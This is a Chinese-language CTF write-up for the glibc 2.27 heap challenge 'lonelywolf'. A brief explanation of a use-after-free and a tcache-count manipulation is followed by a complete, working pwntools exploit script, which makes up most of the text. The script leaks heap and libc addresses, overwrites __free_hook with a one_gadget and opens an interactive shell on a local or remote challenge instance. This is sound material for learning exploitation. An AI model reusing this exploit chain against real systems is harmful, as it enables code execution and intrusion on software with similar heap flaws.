复现一下
程序分析:
保护全开
就是一个菜单类型,功能齐全
存在 UAF:free 之后仍然能 edit,可以绕过 2.27 的 tcache double free 检测
值得注意的是最大申请0x78
利用思路:
一般我们要 getshell 肯定要把 hook 改成 system 或 one_gadget(og),改 hook 就要先拿到 libc 基址;泄露 libc 基址要靠 unsorted bin,但这里最大只能申请 0x78,不在 unsorted bin 的范围,怎么办?
我们可以把 chunk 分配到 tcache 头的地址(堆地址靠 UAF 泄露),把 0x250 对应的 tcache 计数改为 7,libc 就会认为 0x250 的 tcache 已满,释放这个 0x250 的 chunk 就会进入 unsorted bin,从而泄露 libc 基址(同样利用 UAF)
那我们算出og,改hook为og就行了
exp:
from pwn import *
# Target setup: `select` picks where the exploit runs.
#   0 -> local process, 1 -> the remote BUUOJ instance, anything else -> gdb.debug.
local_file = './lonelywolf'
local_libc = './libc-2.27.so'
remote_libc = './libc-2.27.so'
select = 0
if select == 1:
    r = remote('node4.buuoj.cn', 25904)
    libc = ELF(remote_libc)
elif select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = gdb.debug(local_file)
    libc = ELF(local_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch


# Thin wrappers over the pwntools tube so the exploit body stays short.
def se(data):
    return r.send(data)


def sa(delim, data):
    return r.sendafter(delim, data)


def sl(data):
    return r.sendline(data)


def sla(delim, data):
    return r.sendlineafter(delim, data)


def sea(delim, data):
    return r.sendafter(delim, data)


def rc(numb=4096):
    return r.recv(numb)


def rl():
    return r.recvline()


def ru(delims):
    return r.recvuntil(delims)


def uu32(data):
    # Right-pad a short leak with NULs before unpacking it as a 32-bit value.
    return u32(data.ljust(4, '\0'))


def uu64(data):
    # Right-pad a short leak (e.g. the 6 bytes of a user-space pointer) to 8 bytes.
    return u64(data.ljust(8, '\0'))


def info(tag, addr):
    # Log `tag: 0x...` through the tube's logger.
    return r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
    """Attach gdb to the running target, optionally feeding it *cmd* first."""
    target = r
    script = cmd
    gdb.attach(target, script)
#------------------------
def add(size):
    """Menu option 1: allocate *size* bytes into slot 0 (the only slot the exploit uses)."""
    answers = (
        ('Your choice: ', '1'),
        ('Index: ', '0'),
        ('Size: ', str(size)),
    )
    for prompt, reply in answers:
        sla(prompt, reply)
def edit(content):
    """Menu option 2: write *content* into slot 0.

    Per the analysis above this still works after delete(), which is the
    use-after-free the whole exploit is built on.
    """
    answers = (
        ('Your choice: ', '2'),
        ('Index: ', '0'),
        ('Content: ', content),
    )
    for prompt, reply in answers:
        sla(prompt, reply)
def show():
    """Menu option 3: print the contents of slot 0."""
    for prompt, reply in (('Your choice: ', '3'), ('Index: ', '0')):
        sla(prompt, reply)
def delete():
    """Menu option 4: free slot 0 (the stored pointer is not cleared, hence the UAF)."""
    for prompt, reply in (('Your choice: ', '4'), ('Index: ', '0')):
        sla(prompt, reply)
#------------------------------
# --- Stage 1: leak a heap address through the use-after-free ---
# Root cause (see analysis above): delete() frees the chunk but leaves the
# pointer usable, so edit()/show() keep operating on freed memory.
add(0x78)            # 0x78 is the largest request the menu allows
delete()
# The writeup relies on this edit-after-free to get past the tcache
# double-free check before the second delete(); which field the 8 bytes
# clobber depends on the binary's edit routine — confirm in gdb.
edit('a'*0x8)
delete()             # second free of the same chunk
show()
ru('Content: ')
# Only 6 bytes are needed for a user-space pointer; 0x260 is the distance
# the author measured from the leaked pointer back to the start of the heap.
heap_base=uu64(rc(6))-0x260
info('heap_base',heap_base)
#------------------------------
# --- Stage 2: leak libc by forcing a chunk into the unsorted bin ---
# The chunk is still free and still editable: point its tcache `next` at the
# tcache management structure at the top of the heap (heap_base + 0x10, as
# the analysis above describes), then allocate twice so the second add()
# hands back that structure itself.
edit(p64(heap_base+0x10))
add(0x78)
add(0x78)
# Rewrite the per-bin counters of that structure: byte 6 (presumably the bin
# add(0x78) draws from) becomes 1, byte 0x23 — the count for the 0x250 bin,
# i.e. the size of this structure's own chunk — becomes 7 so glibc treats
# that bin as full; the remaining bytes up to 0x78 are zeroed.
payload=p8(0)*6+p8(1)+p8(0)*(0x25-9)+p8(7)
payload+=(0x50-0x4)*'\x00'
payload+=p64(0)
edit(payload)
# Freeing the 0x250 chunk now skips tcache and lands in the unsorted bin, so
# show() prints a main_arena pointer.
delete()
show()
# Scan to the 0x7f high byte of an x86-64 libc address and keep the last 6
# bytes; the author's arithmetic treats the leaked value as the unsorted-bin
# head 96 bytes into main_arena, which sits 0x10 past __malloc_hook in this libc.
libc_base=uu64(ru('\x7f')[-6:])-libc.sym['__malloc_hook']-96-0x10
info('libc_base',libc_base)
# one_gadget offsets for ./libc-2.27.so (see the command at the end of the
# page); they are specific to this libc build.
og=[0x4f2a5,0x4f302,0xe54f7,0xe54fe,0xe5502,0x10a2fc,0x10a308]
malloc_hook=libc.sym['__malloc_hook']+libc_base
realloc_hook=libc.sym['__realloc_hook']+libc_base
free_hook=libc.sym['__free_hook']+libc_base   # only free_hook is used below
#------------------------------
# --- Stage 3: redirect __free_hook to a one_gadget ---
add(0x78)                    # fresh chunk to free and then edit through the UAF again
delete()
edit(p64(free_hook))         # tcache `next` -> __free_hook
add(0x78)
add(0x78)                    # this allocation is served at __free_hook itself
edit(p64(og[5]+libc_base))   # og[5] is the gadget the author found to work here
delete()                     # free() now runs the hook
#debug()
r.interactive()
one_gadget 需要把 level 改成 1:
one_gadget ./libc-2.27.so -l 1